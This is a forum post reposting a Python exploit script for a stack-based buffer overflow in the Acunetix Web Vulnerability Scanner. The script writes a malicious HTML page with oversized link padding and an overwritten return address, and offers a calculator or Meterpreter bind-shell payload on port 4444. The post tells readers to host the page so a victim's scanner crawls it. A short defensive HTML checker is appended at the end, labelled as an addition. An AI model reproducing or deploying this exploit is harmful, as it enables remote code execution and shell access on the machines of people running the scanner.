网基网络安全

Acunetix Remote Stack-Based Buffer Overflow Vulnerability


Post by Admin, Thu May 11, 2017 12:13 pm

Host the generated file on a server. The victim should select the external host. Otherwise we cannot trigger
the vulnerability.
'''
print ('[~] Acunetix Web Vulnerability Scanner Buffer Overflow Exploit\n')
while True:
    try:
        choice = int(raw_input("[?] Choose your payload:\n1. Calculator\n2. Bind Shell\n"))
    except ValueError:
        print "[!] Enter only a number"
        continue

    if choice == 1:
        shellcode = ""
        break

    elif choice == 2:
        # Modify this part with your own custom shellcode
        # msfpayload windows/meterpreter/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t python BufferRegister=ESP
        shellcode = ""

        print "[+] Connect on port 4444"
        break
    else:
        print "[-] Invalid Choice"
        continue

head = ("<html>\
<body>\
<center><h1>Browse this site, very bad :)</h1></center><br>")
junk = ("\
<a href= [Please register and log in to view this link] //"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /
AAAAAAA")
edx = "500f"
junk2 = "BBBB"
# jmp esp | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [WINHTTP.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.2180 (C:\WINDOWS\system32\WINHTTP.dll)
eip = "\x49\x63\x52\x4d"

shellcode += "\">"
tail = ("<img src=\"[Please register and log in to view this link]\">\
</body>\
</html>")
exploit = head + junk + edx + junk2 + eip + shellcode + tail
filename = "Exploit.htm"
file = open(filename, "w")
file.write(exploit)
file.close()
print "[~] " + str(len(exploit)) + " Bytes written to file"
# EOF
- - - End of code - - -

https://networksecurity.souluntan.com
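
A defensive check for the kind of page the script above writes, added here as an example and not part of the original post: it scans HTML for link attributes whose host part is longer than DNS permits, which is how the padding after `<a href=` would stand out before a crawler or scanner processes the page. It assumes the oversized value sits in the host part of an absolute URL; the function names, attribute list and sample page are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

MAX_HOST = 253   # RFC 1035 limit on a full domain name
MAX_LABEL = 63   # RFC 1035 limit on one dot-separated label
URL_ATTRS = {"href", "src", "action"}  # assumed set of URL-bearing attributes


class LinkCollector(HTMLParser):
    """Collect (tag, attribute, value) for every URL-bearing attribute."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                self.links.append((tag, name, value))


def oversized_hosts(html_text):
    """Return findings for links whose host part breaks DNS length limits."""
    collector = LinkCollector()
    collector.feed(html_text)
    findings = []
    for tag, attr, value in collector.links:
        try:
            host = urlsplit(value).hostname or ""
        except ValueError:  # e.g. a malformed bracketed host
            findings.append((tag, attr, len(value), "unparseable URL"))
            continue
        longest = max((len(label) for label in host.split(".")), default=0)
        if len(host) > MAX_HOST or longest > MAX_LABEL:
            findings.append((tag, attr, len(host), "host exceeds DNS limits"))
    return findings


# Constructed sample page: one ordinary link, one with a 300-character host.
SAMPLE = (
    '<html><body>'
    '<a href="http://www.example.com/index.html">ok</a>'
    '<img src="http://' + "A" * 300 + '/x.png">'
    '</body></html>'
)

if __name__ == "__main__":
    for finding in oversized_hosts(SAMPLE):
        print(finding)
```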
